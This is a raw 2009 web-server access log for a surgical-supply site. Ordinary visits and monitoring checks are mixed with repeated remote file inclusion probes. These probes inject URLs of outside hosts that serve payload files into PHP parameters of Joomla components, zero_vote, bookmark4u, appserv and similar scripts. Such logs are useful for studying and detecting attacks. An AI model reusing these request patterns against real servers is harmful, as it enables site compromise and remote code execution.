220.110.168.82 - - [17/Oct/2009:03:04:46 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
220.110.168.82 - - [17/Oct/2009:03:04:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
220.110.168.82 - - [17/Oct/2009:03:04:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [17/Oct/2009:03:04:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
98.119.75.222 - - [17/Oct/2009:03:06:03 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
121.124.127.164 - - [17/Oct/2009:03:06:24 -0400] "GET /logs/error_log.Q109100300%20%20//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:06:24 -0400] "GET //?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:06:24 -0400] "GET /logs//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:06:34 -0400] "GET //?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:06:35 -0400] "GET /logs/error_log.Q109100300%20%20//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:06:35 -0400] "GET /logs//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:06:35 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:06:35 -0400] "GET /lostpasswd.php?env[include_prefix]=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:06:37 -0400] "GET /lostpasswd.php?env[include_prefix]=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:06:37 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:06:38 -0400] "GET /logs/error_log.Q109071300%20%20//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:06:38 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:06:40 -0400] "GET /logs/error_log.Q109071300%20%20//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:06:40 -0400] "GET /logs/access_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:03:07:29 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:07:35 -0400] "GET //skin/zero_vote/error.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:07:35 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:07:38 -0400] "GET //skin/zero_vote/error.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:07:38 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:07:38 -0400] "GET //skin/zero_vote/error.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:07:38 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:07:39 -0400] "GET //skin/zero_vote/error.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:07:39 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:07:47 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/error.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.73.17.7 - - [17/Oct/2009:03:07:48 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/error.php?dir=http://wubkk.wu.ac.th/image/icon/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
210.127.253.142 - - [17/Oct/2009:03:07:53 -0400] "GET ///skin/zero_vote/setup.php?%20dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
210.127.253.142 - - [17/Oct/2009:03:07:53 -0400] "GET /logs/access_log.Q109051200///skin/zero_vote/setup.php?%20dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
210.127.253.142 - - [17/Oct/2009:03:07:53 -0400] "GET /logs///skin/zero_vote/setup.php?%20dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
166.205.131.69 - - [17/Oct/2009:03:08:29 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
94.102.6.154 - - [17/Oct/2009:03:08:57 -0400] "GET //appserv/main.php?appserv_root=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:08:57 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:08:57 -0400] "GET /logs/access_log.Q109051400%20%20//appserv/main.php?appserv_root=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:08:58 -0400] "GET /logs/access_log.Q109051400%20%20//appserv/main.php?appserv_root=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:08:58 -0400] "GET //appserv/main.php?appserv_root=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:08:58 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:09:19 -0400] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:09:19 -0400] "GET /logs/access_log.Q109071700//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:09:19 -0400] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:09:22 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/main.php?appserv_root=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:09:25 -0400] "GET //?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:09:25 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:09:25 -0400] "GET //?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:09:25 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:09:32 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/main.php?appserv_root=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:03:09:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.127.253.142 - - [17/Oct/2009:03:09:55 -0400] "GET ///skin/zero_vote/setup.php?%20dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
210.127.253.142 - - [17/Oct/2009:03:09:55 -0400] "GET /logs/access_log.Q109051200///skin/zero_vote/setup.php?%20dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
210.127.253.142 - - [17/Oct/2009:03:09:55 -0400] "GET /logs///skin/zero_vote/setup.php?%20dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.144.238.168 - - [17/Oct/2009:03:10:31 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
210.127.253.142 - - [17/Oct/2009:03:11:12 -0400] "GET /logs/access_log.Q109053100///skin/zero_vote/setup.php?%20dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
82.127.67.20 - - [17/Oct/2009:03:13:14 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://webmail.aol.com/28702/aol-1/fr-fr/Suite.aspx" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
98.119.75.222 - - [17/Oct/2009:03:13:34 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
76.174.135.70 - - [17/Oct/2009:03:13:52 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSOffice 12)"
76.174.135.70 - - [17/Oct/2009:03:13:52 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSOffice 12)"
147.46.116.207 - - [17/Oct/2009:03:14:22 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
147.46.116.207 - - [17/Oct/2009:03:14:22 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
147.46.116.207 - - [17/Oct/2009:03:14:22 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
147.46.116.207 - - [17/Oct/2009:03:14:22 -0400] "GET /logs/access_log.Q109081900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
210.127.253.142 - - [17/Oct/2009:03:14:28 -0400] "GET /logs///skin/zero_vote/setup.php?%20dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
210.127.253.142 - - [17/Oct/2009:03:14:28 -0400] "GET ///skin/zero_vote/setup.php?%20dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
210.127.253.142 - - [17/Oct/2009:03:14:28 -0400] "GET /logs/access_log.Q109051200///skin/zero_vote/setup.php?%20dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:03:14:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.127.253.142 - - [17/Oct/2009:03:15:16 -0400] "GET /logs/access_log.Q109053100///skin/zero_vote/setup.php?%20dir=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:15:31 -0400] "GET /logs/access_log.Q109062100//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
123.125.66.79 - - [17/Oct/2009:03:16:54 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
122.155.5.84 - - [17/Oct/2009:03:17:02 -0400] "GET //index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:17:02 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:17:02 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
147.46.116.207 - - [17/Oct/2009:03:17:02 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
147.46.116.207 - - [17/Oct/2009:03:17:02 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
147.46.116.207 - - [17/Oct/2009:03:17:02 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
147.46.116.207 - - [17/Oct/2009:03:17:03 -0400] "GET /logs/access_log.Q109081900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.239.157.203 - - [17/Oct/2009:03:17:17 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.239.157.203 - - [17/Oct/2009:03:17:17 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.239.157.203 - - [17/Oct/2009:03:17:22 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:17:34 -0400] "GET //index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:17:34 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:17:34 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:17:41 -0400] "GET //index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:17:41 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:17:44 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:17:56 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:17:56 -0400] "GET //index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:17:56 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.181.7.62 - - [17/Oct/2009:03:18:42 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
196.41.113.26 - - [17/Oct/2009:03:18:45 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:03:18:45 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:03:18:45 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:18:48 -0400] "GET /logs/error_log.Q109092300//index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:19:18 -0400] "GET /logs/error_log.Q109092300//index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:19:30 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:03:19:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
147.46.116.207 - - [17/Oct/2009:03:22:07 -0400] "GET /logs/access_log.Q109082800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:03:22:31 -0400] "GET /logs/access_log.Q109080900/errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:03:22:39 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
147.46.116.207 - - [17/Oct/2009:03:23:20 -0400] "GET /logs/access_log.Q109082000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
76.250.253.115 - - [17/Oct/2009:03:24:30 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
122.155.5.84 - - [17/Oct/2009:03:24:32 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:24:32 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:24:32 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
147.46.116.207 - - [17/Oct/2009:03:24:34 -0400] "GET /logs/access_log.Q109082800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:24:38 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:24:38 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:24:38 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:03:24:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.155.5.84 - - [17/Oct/2009:03:25:01 -0400] "GET /logs/error_log.Q109092600//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:03:25:01 -0400] "GET /logs/error_log.Q109092600//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
147.46.116.207 - - [17/Oct/2009:03:25:40 -0400] "GET /logs/access_log.Q109082000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:26:33 -0400] "GET //racconti//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:26:33 -0400] "GET /logs//racconti//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:03:26:34 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:03:26:38 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
196.41.113.26 - - [17/Oct/2009:03:26:38 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:26:39 -0400] "GET //racconti//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:26:39 -0400] "GET /logs//racconti//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:03:26:55 -0400] "GET /logs/error.php?setup[use_category]=1&dir=http://www.futu.co.kr/cgi-bin/zboard/data/test.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.206.120.162 - - [17/Oct/2009:03:26:57 -0400] "GET /error.php?setup[use_category]=1&dir=http://www.futu.co.kr/cgi-bin/zboard/data/test.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
94.102.6.154 - - [17/Oct/2009:03:27:12 -0400] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:12 -0400] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
